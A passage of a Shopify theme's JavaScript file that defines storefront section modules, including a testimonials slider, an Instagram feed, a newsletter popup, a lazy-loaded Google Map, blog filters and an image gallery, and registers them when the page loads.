        return backgroundImage;
    })();

    theme.Testimonials = (function() {
        var slideCount = 0;
        var defaults = {
            accessibility: true,
            arrows: false,
            dots: true,
            autoplay: false,
            touchThreshold: 20,
            slidesToShow: 3,
            slidesToScroll: 3
        };

        function Testimonials(container) {
            var $container = this.$container = $(container);
            var sectionId = $container.attr('data-section-id');
            var wrapper = this.wrapper = '.testimonials-wrapper';
            var slider = this.slider = '#Testimonials-' + sectionId;
            var $slider = $(slider);

            this.sliderActive = false;
            var mobileOptions = $.extend({}, defaults, {
                slidesToShow: 1,
                slidesToScroll: 1,
                adaptiveHeight: true
            });

            slideCount = $slider.data('count');

            // Override slidesToShow/Scroll if there are not enough blocks
            if (slideCount < defaults.slidesToShow) {
                defaults.slidesToShow = slideCount;
                defaults.slidesToScroll = slideCount;
            }

            $slider.on('init', this.a11y.bind(this));

            if (theme.config.bpSmall) {
                this.init($slider, mobileOptions);
            } else {
                this.init($slider, defaults);
            }

            $('body').on('matchSmall', function() {
                this.init($slider, mobileOptions);
            }.bind(this));

            $('body').on('matchLarge', function() {
                this.init($slider, defaults);
            }.bind(this));
        }

        Testimonials.prototype = $.extend({}, Testimonials.prototype, {
            onUnload: function() {
                $(this.slider, this.wrapper).slick('unslick');
            },

            onBlockSelect: function(evt) {
                // Ignore the cloned version
                var $slide = $('.testimonials-slide--' + evt.detail.blockId + ':not(.slick-cloned)');
                var slideIndex = $slide.data('slick-index');

                // Go to selected slide, pause autoplay
                $(this.slider, this.wrapper).slick('slickGoTo', slideIndex);
            },

            init: function(obj, args) {
                if (this.sliderActive) {
                    obj.slick('unslick');
                    this.sliderActive = false;
                }

                obj.slick(args);
                this.sliderActive = true;

                if (AOS) {
                    AOS.refresh();
                }
            },

            a11y: function(event, obj) {
                var $list = obj.$list;
                var $wrapper = $(this.wrapper, this.$container);

                // Remove default Slick aria-live attr until slider is focused
                $list.removeAttr('aria-live');

                // When an element in the slider is focused set aria-live
                $wrapper.on('focusin', function(evt) {
                    if ($wrapper.has(evt.target).length) {
                        $list.attr('aria-live', 'polite');
                    }
                });

                // Remove aria-live
                $wrapper.on('focusout', function(evt) {
                    if ($wrapper.has(evt.target).length) {
                        $list.removeAttr('aria-live');
                    }
                });
            }
        });

        return Testimonials;
    })();

    theme.Instagram = (function() {
        function Instagram(container) {
            var $container = this.$container = $(container);
            var sectionId = $container.attr('data-section-id');
            var $target = $('#Instafeed-' + sectionId);

            if (!$target.length) {
                return;
            }

            var userId = $target.data('user-id');
            var clientId = $target.data('client-id');
            var count = parseInt($target.data('count'));
            var gridItemWidth = $target.data('grid-item-width');

            // Ask for 2 more images than we'll actually show because
            // Instagram sometimes doesn't send enough
            var feed = this.feed = new Instafeed({
                target: $target[0],
                accessToken: clientId,
                get: 'user',
                userId: userId,
                limit: count + 2,
                template: '<div class="grid__item '+ gridItemWidth +'"><div class="image-wrap"><a href="{{link}}" target="_blank" style="background-image: url({{image}}); display: block; padding-bottom: 100%; background-size: cover; background-position: center;"></a></div></div>',
                resolution: 'standard_resolution'
            });

            feed.run();
        }

        Instagram.prototype = $.extend({}, Instagram.prototype, {
            onUnload: function() {

            }
        });

        return Instagram;
    })();


    theme.NewsletterPopup = (function() {
        function NewsletterPopup(container) {
            var $container = this.$container = $(container);
            var sectionId = $container.attr('data-section-id');
            this.cookieName = 'newsletter-' + sectionId;

            if (!$container.length) {
                return;
            }

            this.data = {
                secondsBeforeShow: $container.data('delay-seconds'),
                daysBeforeReappear: $container.data('delay-days'),
                cookie: $.cookie(this.cookieName),
                testMode: $container.data('test-mode')
            };

            this.modal = new theme.Modals('NewsletterPopup-' + sectionId, 'newsletter-popup-modal');

            // Open modal if errors or success message exist
            if ($container.find('.errors').length || $container.find('.note--success').length) {
                this.modal.open();
            }

            // Set cookie as opened if success message
            if ($container.find('.note--success').length) {
                this.closePopup(true);
                return;
            }

            $('body').on('modalClose.' + $container.attr('id'), this.closePopup.bind(this));

            if (!this.data.cookie || this.data.testMode) {
                this.initPopupDelay();
            }
        }

        NewsletterPopup.prototype = $.extend({}, NewsletterPopup.prototype, {
            initPopupDelay: function() {
                setTimeout(function() {
                    this.modal.open();
                }.bind(this), this.data.secondsBeforeShow * 1000);
            },

            closePopup: function(success) {
                // Remove a cookie in case it was set in test mode
                if (this.data.testMode) {
                    $.removeCookie(this.cookieName, { path: '/' });
                    return;
                }

                var expiry = success ? 200 : this.data.daysBeforeReappear;

                $.cookie(this.cookieName, 'opened', { path: '/', expires: expiry });
            },

            onLoad: function() {
                this.modal.open();
            },

            onSelect: function() {
                this.modal.open();
            },

            onDeselect: function() {
                this.modal.close();
            },

            onUnload: function() {}
        });

        return NewsletterPopup;
    })();

    theme.FadingImages = (function() {

        var classes = {
            activeImage: 'active-image',
            finishedImage: 'finished-image',
            activeTitles: 'active-titles',
            finishedTitles: 'finished-titles',
            compensation: 'compensation'
        };

        function FadingImages(container) {
            var $container = this.$container = $(container);
            var sectionId = $container.attr('data-section-id');
            var namespace = this.namespace = '.fading-images-' + sectionId;

            if (!$container.length) {
                return;
            }

            var $imageContainer = $container.find('.fading-images');
            theme.loadImageSection($imageContainer);

            this.data = {
                isInit: false,
                interval: $container.data('interval'),
                block_count: $container.data('count'),
                finish_interval: 1000,
                timer_offset: 400,
                active_image: 1,
                active_title: 1,
                removed_compensation: false
            };

            this.selectors = {
                $allTitles: $container.find('.fading-images-overlay__titles')
            };

            this.checkVisibility();
            $(window).on('scroll' + this.namespace, $.throttle(100, this.checkVisibility.bind(this)));
        }

        FadingImages.prototype = $.extend({}, FadingImages.prototype, {
            checkVisibility: function() {
                if (this.data.isInit) {
                    $(window).off('scroll' + this.namespace);
                    return;
                }

                if (theme.isElementVisible(this.$container)) {
                    this.startImages();
                    this.startTitles();
                    this.data.isInit = true;
                }
            },

            nextImage: function() {
                var $container = this.$container;

                if (!this.data.removed_compensation) {
                    $container.find('.fading-images__item[data-slide-index=' + this.data.active_image + ']').removeClass(classes.compensation);
                    this.data.removed_compensation = true;
                }

                $container
                    .find('.fading-images__item[data-slide-index=' + this.data.active_image + ']')
                    .removeClass(classes.activeImage)
                    .addClass(classes.finishedImage);

                var target_image = this.data.active_image;
                window.setTimeout(function() {
                    $container.find('.fading-images__item[data-slide-index=' + target_image + ']').removeClass(classes.finishedImage);
                }, this.data.finish_interval);

                this.data.active_image++;
                if (this.data.active_image > this.data.block_count) {
                    this.data.active_image = 1;
                }

                $container.find('.fading-images__item[data-slide-index=' + this.data.active_image + ']').addClass(classes.activeImage);
            },

            nextTitle: function() {
                var $container = this.$container;
                var $allTitles = this.selectors.$allTitles;

                this.selectors.$allTitles.removeClass(classes.activeTitles).addClass(classes.finishedTitles);

                this.data.active_title++;
                if (this.data.active_title > this.data.block_count) {
                    this.data.active_title = 1;
                }

                var target_title = this.data.active_title;
                window.setTimeout(function() {
                    var newText1 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title1');
                    var newText2 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title2');
                    $container.find('.fading-images-overlay__title--1').text(newText1);
                    $container.find('.fading-images-overlay__title--2').text(newText2);
                    $allTitles.removeClass(classes.finishedTitles).addClass(classes.activeTitles);
                }, this.data.finish_interval - 200);
            },

            startImages: function() {
                // Prep and show first image
                this.$container.find('.fading-images__item[data-slide-index=' + this.data.active_image + ']').addClass(classes.activeImage).addClass(classes.compensation);

                // Begin timer
                var o = this;
                window.setTimeout(function() {
                    var fading_images_timer = window.setInterval(o.nextImage.bind(o), o.data.interval);
                }, this.data.timer_offset);
            },

            startTitles: function() {
                var $container = this.$container;
                var $allTitles = this.selectors.$allTitles;
                // Prep and show first titles
                var target_title = this.data.active_title;
                window.setTimeout(function() {
                    var newText1 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title1');
                    var newText2 = $container.find('.fading-images__item[data-slide-index=' + target_title + ']').attr('data-slide-title2');
                    $container.find('.fading-images-overlay__title--1').text(newText1);
                    $container.find('.fading-images-overlay__title--2').text(newText2);
                    $allTitles.addClass(classes.activeTitles);
                }, 750);

                // Begin timer
                var fading_titles_timer = window.setInterval(this.nextTitle.bind(this), this.data.interval);
            },

            onUnload: function() {
                $(window).off('scroll' + this.namespace);
            }
        });

        return FadingImages;
    })();

    theme.Maps = (function() {
        var config = {
            zoom: 14
        };
        var apiStatus = null;
        var mapsToLoad = [];

        var errors = {
            addressNoResults: theme.strings.addressNoResults,
            addressQueryLimit: theme.strings.addressQueryLimit,
            addressError: theme.strings.addressError,
            authError: theme.strings.authError
        };

        var selectors = {
            section: '[data-section-type="map"]',
            map: '[data-map]',
            mapOverlay: '[data-map-overlay]'
        };

        var classes = {
            mapError: 'map-section--load-error',
            errorMsg: 'map-section__error errors text-center'
        };

        // Global function called by Google on auth errors.
        // Show an auto error message on all map instances.
        window.gm_authFailure = function() {
            if (!Shopify.designMode) {
                return;
            }

            $(selectors.section).addClass(classes.mapError);
            $(selectors.map).remove();
            $(selectors.mapOverlay).after(
                '<div class="' +
                classes.errorMsg +
                '">' +
                theme.strings.authError +
                '</div>'
            );
        };

        function Map(container) {
            this.$container = $(container);
            this.sectionId = this.$container.attr('data-section-id');
            this.namespace = '.map-' + this.sectionId;
            this.$map = this.$container.find(selectors.map);
            this.key = this.$map.data('api-key');

            if (!this.key) {
                return;
            }

            // Lazyload API
            this.checkVisibility();
            $(window).on('scroll' + this.namespace, $.throttle(50, this.checkVisibility.bind(this)));
        }

        function initAllMaps() {
            // API has loaded, load all Map instances in queue
            $.each(mapsToLoad, function(index, instance) {
                instance.createMap();
            });
        }

        function geolocate($map) {
            var deferred = $.Deferred();
            var geocoder = new google.maps.Geocoder();
            var address = $map.data('address-setting');

            geocoder.geocode({ address: address }, function(results, status) {
                if (status !== google.maps.GeocoderStatus.OK) {
                    deferred.reject(status);
                }

                deferred.resolve(results);
            });

            return deferred;
        }

        Map.prototype = $.extend({}, Map.prototype, {
            prepMapApi: function() {
                if (apiStatus === 'loaded') {
                    this.createMap();
                } else {
                    mapsToLoad.push(this);

                    if (apiStatus !== 'loading') {
                        apiStatus = 'loading';
                        if (typeof window.google === 'undefined') {
                            $.getScript(
                                'https://maps.googleapis.com/maps/api/js?key=' + this.key
                            ).then(function() {
                                apiStatus = 'loaded';
                                initAllMaps();
                            });
                        }
                    }
                }
            },

            createMap: function() {
                var $map = this.$map;

                return geolocate($map)
                    .then(
                        function(results) {
                            var mapOptions = {
                                zoom: config.zoom,
                                backgroundColor: 'none',
                                center: results[0].geometry.location,
                                draggable: false,
                                clickableIcons: false,
                                scrollwheel: false,
                                disableDoubleClickZoom: true,
                                disableDefaultUI: true
                            };

                            var map = (this.map = new google.maps.Map($map[0], mapOptions));
                            var center = (this.center = map.getCenter());

                            var marker = new google.maps.Marker({
                                map: map,
                                position: map.getCenter()
                            });

                            google.maps.event.addDomListener(
                                window,
                                'resize',
                                $.debounce(250, function() {
                                    google.maps.event.trigger(map, 'resize');
                                    map.setCenter(center);
                                    $map.removeAttr('style');
                                })
                            );
                        }.bind(this)
                    )
                    .fail(function() {
                        var errorMessage;

                        switch (status) {
                            case 'ZERO_RESULTS':
                                errorMessage = errors.addressNoResults;
                                break;
                            case 'OVER_QUERY_LIMIT':
                                errorMessage = errors.addressQueryLimit;
                                break;
                            case 'REQUEST_DENIED':
                                errorMessage = errors.authError;
                                break;
                            default:
                                errorMessage = errors.addressError;
                                break;
                        }

                        // Show errors only to merchant in the editor.
                        if (Shopify.designMode) {
                            $map
                                .parent()
                                .addClass(classes.mapError)
                                .html(
                                    '<div class="' +
                                    classes.errorMsg +
                                    '">' +
                                    errorMessage +
                                    '</div>'
                                );
                        }
                    });
            },

            checkVisibility: function() {
                if (theme.isElementVisible(this.$container, 600)) {
                    this.prepMapApi();
                    $(window).off(this.namespace);
                }
            },

            onUnload: function() {
                if (this.$map.length === 0) {
                    return;
                }
                // Causes a harmless JS error when a section without an active map is reloaded
                google.maps.event.clearListeners(this.map, 'resize');
            }
        });

        return Map;
    })();

    theme.Blog = (function() {

        function Blog(container) {
            this.tagFilters();
        }

        Blog.prototype = $.extend({}, Blog.prototype, {
            tagFilters: function() {
                var $filterBy = $('#BlogTagFilter');

                if (!$filterBy.length) {
                    return;
                }

                $filterBy.on('change', function() {
                    location.href = $(this).val();
                });
            },

            onUnload: function() {

            }
        });

        return Blog;
    })();

    theme.Photoswipe = (function() {
        var selectors = {
            photoswipeImg: '.photoswipe__image'
        }

        function Photoswipe(container) {
            var $container = this.$container = $(container);
            var sectionId = $container.attr('data-section-id');
            this.namespace = '.photoswipe-' + this.sectionId;
            var $images = this.$images = $container.find(selectors.photoswipeImg);
            this.gallery;

            if (!$container.length) {
                return;
            }

            this.init();
        }

        Photoswipe.prototype = $.extend({}, Photoswipe.prototype, {
            init: function() {
                var haveImages = false;
                var items = [];
                var options = {};

                this.$images.each(function() {
                    var haveImages = true;
                    var smallSrc = $(this).prop('currentSrc') || $(this).prop('src');
                    var item = {
                        msrc: smallSrc,
                        src: $(this).data('photoswipe-src'),
                        w: $(this).data('photoswipe-width'),
                        h: $(this).data('photoswipe-height'),
                        el: $(this)[0]
                    };

                    items.push(item);
                });

                this.$images.on('click' + this.namespace, function(evt) {
                    index = $(evt.currentTarget).data('index');
                    this.initGallery(items, index);
                }.bind(this));
            },

            initGallery: function(items, index) {
                var pswpElement = document.querySelectorAll('.pswp')[0];

                var options = {
                    history: false,
                    index: index - 1,
                    getThumbBoundsFn: function(index) {
                        var pageYScroll = window.pageYOffset || document.documentElement.scrollTop;
                        var thumbnail = items[index].el;
                        var rect = thumbnail.getBoundingClientRect();
                        return {x:rect.left, y:rect.top + pageYScroll, w:rect.width};
                    }
                }

                this.gallery = new PhotoSwipe(pswpElement, PhotoSwipeUI_Default, items, options);
                this.gallery.init();
            },

            onUnload: function() {
                this.$images.off('click' + this.namespace);
                this.gallery.destroy()
            }
        });

        return Photoswipe;
    })();



    theme.config = {
        bpSmall: false,
        hasSessionStorage: true,
        mediaQuerySmall: 'screen and (max-width: 767px)',
        mediaQueryMediumUp: 'screen and (min-width: 768px)',
        youTubeReady: false,
        vimeoReady: false,
        vimeoLoading: false,
        isTouch: ('ontouchstart' in window) || window.DocumentTouch && window.document instanceof DocumentTouch || window.navigator.maxTouchPoints || window.navigator.msMaxTouchPoints ? true : false,
        isIpad: /ipad/.test(window.navigator.userAgent.toLowerCase()),
        stickyHeader: false,
        recentlyViewed: []
    };

    if (theme.config.isIpad) {
        document.documentElement.className += ' js-ipad';
    }

    theme.recentlyViewed = {
        recent: {}, // will store handle+url of recent products
        productInfo: {} // will store product data to reduce API calls
    };

    window.onYouTubeIframeAPIReady = function() {
        theme.config.youTubeReady = true;
        $('body').trigger('youTubeReady');
    }

    window.loadYouTube = function() {
        if (theme.config.youtubeReady) {
            return;
        }

        var tag = document.createElement('script');
        tag.src = "https://www.youtube.com/iframe_api";
        var firstScriptTag = document.getElementsByTagName('script')[0];
        firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);
    }

    window.loadVimeo = function() {
        if (theme.config.vimeoLoading) {
            return;
        }

        if (!theme.config.vimeoReady) {
            theme.config.vimeoLoading = true;
            var tag = document.createElement('script');
            tag.src = "https://player.vimeo.com/api/player.js";
            var firstScriptTag = document.getElementsByTagName('script')[0];
            firstScriptTag.parentNode.insertBefore(tag, firstScriptTag);

            // Because there's no way to check for the Vimeo API being loaded
            // asynchronously, we use this terrible timeout to wait for it being ready
            checkIfVimeoIsReady()
                .then(function() {
                    theme.config.vimeoReady = true;
                    theme.config.vimeoLoading = false;
                    $('body').trigger('vimeoReady');
                })
                .fail(function() {
                    // No vimeo API to talk to
                });
        }
    }

    function checkIfVimeoIsReady() {
        var deferred = $.Deferred();
        var wait;
        var timeout;

        wait = setInterval(function() {
            if (!Vimeo) {
                return;
            }

            clearInterval(wait);
            clearTimeout(timeout);
            deferred.resolve();
        }, 500);

        timeout = setTimeout(function() {
            clearInterval(wait);
            deferred.reject();
        }, 4000); // subjective. test up to 8 times over 4 seconds

        return deferred;
    }

    theme.init = function() {
        theme.setGlobals();
        theme.pageTransitions();
        theme.collectionTemplate.init();
        theme.initQuickShop();
        theme.videoModal();
        theme.backButton.init();
        theme.customerTemplates.init();
        theme.collapsibles.init();

        slate.rte.wrapTable();
        slate.rte.wrapVideo();

        AOS.init({
            easing: 'ease-out-quad',
            once: true,
            offset: 60,
            disableMutationObserver: true
        });

        $(document.documentElement).on('keyup.tab', function(evt) {
            if (evt.keyCode === 9) {
                $(document.documentElement).addClass('tab-outline');
                $(document.documentElement).off('keyup.tab');
            }
        });

        // Change email icon to submit text
        $('.footer__newsletter-input').on('keyup', function() {
            $(this).addClass('footer__newsletter-input--active');
        });
    };

    theme.setGlobals = function() {
        theme.config.hasSessionStorage = theme.isSessionStorageSupported();
        theme.recentlyViewed.handleCookie = $.cookie('theme-recent');
        if (theme.recentlyViewed.handleCookie) {
            theme.recentlyViewed.recent = JSON.parse(theme.recentlyViewed.handleCookie);
        }

        theme.recentlyViewed.productInfo = theme.config.hasSessionStorage && sessionStorage['recent-products'] ? JSON.parse(sessionStorage['recent-products']) : {};

        if (theme.config.isTouch) {
            $('body').addClass('supports-touch');
        }

        enquire.register(theme.config.mediaQuerySmall, {
            match: function() {
                theme.config.bpSmall = true;
                $('body').trigger('matchSmall');
            },
            unmatch: function() {
                theme.config.bpSmall = false;
                $('body').trigger('unmatchSmall');
            }
        });

        enquire.register(theme.config.mediaQueryMediumUp, {
            match: function() {
                $('body').trigger('matchLarge');
            },
            unmatch: function() {
                $('body').trigger('unmatchLarge');
            }
        });
    };

    theme.loadImageSection = function($container) {
        // Wait until images inside container have lazyloaded class
        function setAsLoaded() {
            $container.removeClass('loading loading--delayed').addClass('loaded');
        }

        function checkForLazyloadedImage() {
            return $container.find('.lazyloaded').length;
        }

        // If it has SVGs it's in the onboarding state so set as loaded
        if ($container.find('svg').length) {
            setAsLoaded();
            return;
        };

        if (checkForLazyloadedImage() > 0) {
            setAsLoaded();
            return;
        }

        var interval = setInterval(function() {
            if (checkForLazyloadedImage() > 0) {
                clearInterval(interval);
                setAsLoaded();
            }
        }, 80);
    }

    theme.isSessionStorageSupported = function() {
        // Return false if we are in an iframe without access to sessionStorage
        if (window.self !== window.top) {
            return false;
        }

        var testKey = 'test';
        var storage = window.sessionStorage;
        try {
            storage.setItem(testKey, '1');
            storage.removeItem(testKey);
            return true;
        } catch (error) {
            return false;
        }
    };

    theme.isElementVisible = function($el, threshold) {
        var rect = $el[0].getBoundingClientRect();
        var windowHeight = window.innerHeight || document.documentElement.clientHeight;
        threshold = threshold ? threshold : 0;

        return (
            rect.bottom >= 0 &&
            rect.right >= 0 &&
            rect.top <= (windowHeight + threshold) &&
            rect.left <= (window.innerWidth || document.documentElement.clientWidth)
        );
    };

    theme.pageTransitions = function() {
        if ($('body').data('transitions') == true) {
            var namespace = '.page-transition';

            // Hack test to fix Safari page cache issue.
            // window.onpageshow doesn't always run when navigating
            // back to the page, so the unloading class remains, leaving
            // a white page. Setting a timeout to remove that class when leaving
            // the page actually finishes running when they come back.
            if (!!navigator.userAgent.match(/Version\/[\d\.]+.*Safari/)) {
                $('a').off(namespace).on('click' + namespace, function() {
                    window.setTimeout(function() {
                        $('body').removeClass('unloading');
                    }, 1200);
                });
            }

            // Add disable transition class to malito, anchor, and YouTube links
            $('a[href^="mailto:"], a[href^="#"], a[target="_blank"], a[href*="youtube.com/watch"], a[href*="youtu.be/"]').each(function() {
                $(this).addClass('js-no-transition');
            });

            $('a:not(.js-no-transition)').off(namespace).on('click' + namespace, function(evt) {
                if (evt.metaKey) return true;
                evt.preventDefault();
                $('body').addClass('unloading');
                var src = $(this).attr('href');
                window.setTimeout(function() {
                    location.href = src;
                }, 50);
            });

            // iOS caches the page state, so close the drawer when navigating away
            $('a.mobile-nav__link').off(namespace).on('click' + namespace, function() {
                theme.NavDrawer.close();
            });
        }
    };

    theme.reinitSection = function(section) {
        for (var i = 0; i < sections.instances.length; i++) {
            var instance = sections.instances[i];
            if (instance['type'] === section) {
                if (typeof instance.forceReload === 'function') {
                    instance.forceReload();
                }
            }
        }
    }

    window.onpageshow = function(evt) {
        // Removes unload class when returning to page via history
        if (evt.persisted) {
            $('body').removeClass('unloading');
        }
    };

    $(document).ready(function() {
        theme.init();

        window.sections = new theme.Sections();
        sections.register('header-section', theme.HeaderSection);
        sections.register('slideshow-section', theme.SlideshowSection);
        sections.register('video-section', theme.VideoSection);
        sections.register('background-image', theme.BackgroundImage);
        sections.register('recently-viewed', theme.RecentlyViewed);
        sections.register('product', theme.Product);
        sections.register('product-template', theme.Product);
        sections.register('collection-header', theme.CollectionHeader);
        sections.register('collection-sidebar', theme.CollectionSidebar);
        sections.register('collection-template', theme.Collection);
        sections.register('featured-content-section', theme.FeaturedContentSection);
        sections.register('testimonials', theme.Testimonials);
        sections.register('instagram', theme.Instagram);
        sections.register('newsletter-popup', theme.NewsletterPopup);
        sections.register('fading-images', theme.FadingImages);
        sections.register('map', theme.Maps);
        sections.register('blog', theme.Blog);
        sections.register('photoswipe', theme.Photoswipe);
    });
})(theme.jQuery);
